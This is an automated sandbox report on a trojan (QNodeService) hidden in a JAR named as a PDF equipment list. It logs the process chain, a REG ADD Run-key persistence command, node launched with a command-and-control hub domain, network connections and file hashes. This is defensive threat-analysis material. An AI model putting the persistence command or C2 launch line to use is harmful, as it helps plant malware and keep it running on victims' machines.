Malware Analysis Report

2024-10-19 10:30

Sample ID 201005-djf6l11372
Target list of equipment_puma_pdf.jar
SHA256 0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6
Tags
trojan qnodeservice persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6

Threat Level: Known bad

The file list of equipment_puma_pdf.jar was found to be: Known bad.

Malicious Activity Summary

trojan qnodeservice persistence

QNodeService

Executes dropped EXE

Adds Run key to start application

JavaScript code in executable

Looks up external IP address via web service

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2020-10-05 13:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2020-10-05 13:14

Reported

2020-10-05 13:16

Platform

win7

Max time kernel

3s

Max time network

16s

Command Line

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2020-10-05 13:14

Reported

2020-10-05 13:16

Platform

win10v200722

Max time kernel

128s

Max time network

132s

Command Line

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

Signatures

QNodeService

trojan qnodeservice

Adds Run key to start application

persistence

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\8aa35a81-23a1-45e0-be91-c4ef6db99f6f = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | C:\Windows\system32\reg.exe | N/A

JavaScript code in executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | wtfismyip.com | N/A | N/A
N/A | wtfismyip.com | N/A | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3956 wrote to memory of 3516 | N/A | C:\ProgramData\Oracle\Java\javapath\java.exe | C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3956 wrote to memory of 3516 | N/A | C:\ProgramData\Oracle\Java\javapath\java.exe | C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3516 wrote to memory of 3580 | N/A | C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3516 wrote to memory of 3580 | N/A | C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3580 wrote to memory of 788 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3580 wrote to memory of 788 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 788 wrote to memory of 3184 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 788 wrote to memory of 3184 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3184 wrote to memory of 2180 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Windows\system32\cmd.exe
PID 3184 wrote to memory of 2180 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Windows\system32\cmd.exe
PID 2180 wrote to memory of 1648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
PID 2180 wrote to memory of 1648 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe

Processes

C:\ProgramData\Oracle\Java\javapath\java.exe

java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""

C:\Windows\system32\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""

Network

Country | Destination | Domain | Proto
N/A | 8.8.8.8:53 | nodejs.org | udp
N/A | 104.20.23.46:443 | nodejs.org | tcp
N/A | 8.8.8.8:53 | empefarm.ddns.net | udp
N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp
N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp
N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp
N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp
N/A | 8.8.8.8:53 | wtfismyip.com | udp
N/A | 95.217.228.176:443 | wtfismyip.com | tcp

Files

memory/3516-51-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp

MD5 9d5548aa1a52a4fd8cc9ad1c64a23a09
SHA1 72474bd84027c0aa72b09c3f48e1c57ecf935bb2
SHA256 0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6
SHA512 c73296d0b6cd972a90eef0e7a4c32874cf190cf2d545f2f1338ce2d3bf7dfc784a46bf514be6b7d2ebb92124e610c86667a53f7d3ebe5c31a5791a6ef8e90eb6

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3580-161-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3580-163-0x000000AF59080000-0x000000AF59081000-memory.dmp

memory/788-164-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/788-166-0x0000001D75AC0000-0x0000001D75AC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js

MD5 c686d5fcf94d07f7cee70109eba9c4d3
SHA1 588eee04fdbf1fa372c8389c66d581e0b37afd7e
SHA256 e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d
SHA512 5af3b52daafe41bf891dcd846c3b8c15c04d1da2cdb28c915cf970f2fbe3d7bba6b6fc7c291a431a2d0a437f159322401eb8aa567a146763d665ca76677853a3

memory/3184-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3184-170-0x000000A1111C0000-0x000000A1111C1000-memory.dmp

memory/2180-171-0x0000000000000000-mapping.dmp

memory/1648-172-0x0000000000000000-mapping.dmp